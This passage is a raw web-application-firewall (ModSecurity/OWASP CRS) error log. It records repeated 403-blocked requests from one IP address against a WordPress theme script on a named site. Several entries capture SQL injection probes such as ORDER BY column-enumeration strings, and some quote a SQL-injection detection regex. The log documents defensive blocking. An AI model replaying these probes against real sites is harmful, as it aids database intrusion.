Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGhEGuaLybMBNkB61uJAAAAEE"] [Sun Jul 07 16:20:04.902569 2024] [:error] [pid 30827:tid 139722609362688] [client 141.98.81.37:38008] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGhEGuaLybMBNkB61uJQAAAEc"] [Sun Jul 07 16:20:05.982684 2024] [:error] [pid 31926:tid 139722500257536] [client 141.98.81.37:38010] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGhXug2jzbr_AlO3d0GQAAANQ"] [Sun Jul 07 16:20:07.131088 2024] [:error] [pid 30827:tid 139722642933504] [client 141.98.81.37:38012] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGh0GuaLybMBNkB61uJgAAAEM"] [Sun Jul 07 16:20:08.253899 2024] [:error] [pid 30827:tid 139722592577280] [client 141.98.81.37:38014] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGiEGuaLybMBNkB61uJwAAAEk"] [Sun Jul 07 16:20:09.273214 2024] [:error] [pid 31926:tid 139722651326208] [client 141.98.81.37:38016] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGiXug2jzbr_AlO3d0GgAAAMI"] [Sun Jul 07 16:20:10.932318 2024] [:error] [pid 30828:tid 139722483472128] [client 141.98.81.37:38018] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47%' ORDER BY 1-- NvWv"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGijbJWLg2ecbngu9JdgAAAJY"] [Sun Jul 07 16:20:11.468055 2024] [:error] [pid 30827:tid 139722567399168] [client 141.98.81.37:38020] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGi0GuaLybMBNkB61uKAAAAEw"] [Sun Jul 07 16:20:12.574410 2024] [:error] [pid 30827:tid 139722491864832] [client 141.98.81.37:38022] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGjEGuaLybMBNkB61uKQAAAFU"] [Sun Jul 07 16:20:13.813541 2024] [:error] [pid 30827:tid 139722533828352] [client 141.98.81.37:38024] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGjUGuaLybMBNkB61uKgAAAFA"] [Sun Jul 07 16:20:14.929944 2024] [:error] [pid 30827:tid 139722550613760] [client 141.98.81.37:38026] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGjkGuaLybMBNkB61uKwAAAE4"] [Sun Jul 07 16:20:17.395469 2024] [:error] [pid 30827:tid 139722508650240] [client 141.98.81.37:38028] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGkUGuaLybMBNkB61uLAAAAFM"] [Sun Jul 07 16:20:17.640063 2024] [:error] [pid 31926:tid 139722668111616] [client 141.98.81.37:38030] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGkXug2jzbr_AlO3d0GwAAAMA"] [Sun Jul 07 16:20:18.620118 2024] [:error] [pid 31926:tid 139722567399168] [client 141.98.81.37:38032] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGknug2jzbr_AlO3d0HAAAAMw"] [Sun Jul 07 16:20:19.707684 2024] [:error] [pid 31926:tid 139722491864832] [client 141.98.81.37:38034] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGk3ug2jzbr_AlO3d0HQAAANU"] [Sun Jul 07 16:20:20.870597 2024] [:error] [pid 31926:tid 139722600969984] [client 141.98.81.37:38036] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGlHug2jzbr_AlO3d0HgAAAMg"] [Sun Jul 07 16:20:21.942463 2024] [:error] [pid 31926:tid 139722584184576] [client 141.98.81.37:38038] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGlXug2jzbr_AlO3d0HwAAAMo"] [Sun Jul 07 16:20:22.973429 2024] [:error] [pid 30828:tid 139722642933504] [client 141.98.81.37:38040] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1-- usvx"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGljbJWLg2ecbngu9JdwAAAIM"] [Sun Jul 07 16:20:23.990595 2024] [:error] [pid 30828:tid 139722500257536] [client 141.98.81.37:38042] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGlzbJWLg2ecbngu9JeAAAAJQ"] [Sun Jul 07 16:20:25.018916 2024] [:error] [pid 30827:tid 139722559006464] [client 141.98.81.37:38044] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGmUGuaLybMBNkB61uLQAAAE0"] [Sun Jul 07 16:20:26.042463 2024] [:error] [pid 30827:tid 139722517042944] [client 141.98.81.37:38046] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGmkGuaLybMBNkB61uLgAAAFI"] [Sun Jul 07 16:20:27.142120 2024] [:error] [pid 30827:tid 139722617755392] [client 141.98.81.37:38048] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGm0GuaLybMBNkB61uLwAAAEY"] [Sun Jul 07 16:20:28.162705 2024] [:error] [pid 30827:tid 139722584184576] [client 141.98.81.37:38050] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGnEGuaLybMBNkB61uMAAAAEo"] [Sun Jul 07 16:20:29.224021 2024] [:error] [pid 30827:tid 139722626148096] [client 141.98.81.37:38052] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGnUGuaLybMBNkB61uMQAAAEU"] [Sun Jul 07 16:20:30.259626 2024] [:error] [pid 30828:tid 139722592577280] [client 141.98.81.37:38054] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGnjbJWLg2ecbngu9JeQAAAIk"] [Sun Jul 07 16:20:31.427132 2024] [:error] [pid 30826:tid 139722642933504] [client 141.98.81.37:38056] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGn_cO2IzqYGkif72pQAAAAAM"] [Sun Jul 07 16:20:32.686955 2024] [:error] [pid 30828:tid 139722466686720] [client 141.98.81.37:38058] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGoDbJWLg2ecbngu9JegAAAJg"] [Sun Jul 07 16:20:33.617612 2024] [:error] [pid 30828:tid 139722491864832] [client 141.98.81.37:38060] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGoTbJWLg2ecbngu9JewAAAJU"] [Sun Jul 07 16:20:34.674497 2024] [:error] [pid 30826:tid 139722600969984] [client 141.98.81.37:38062] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47) ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGovcO2IzqYGkif72pQQAAAAg"] [Sun Jul 07 16:20:35.764131 2024] [:error] [pid 31926:tid 139722542221056] [client 141.98.81.37:38064] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZosGo3ug2jzbr_AlO3d0IAAAAM8"] [Sun Jul 07 16:20:36.853426 2024] [:error] [pid 31926:tid 139722475079424] [client 141.98.81.37:38066] [client 141.98.81.37] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag 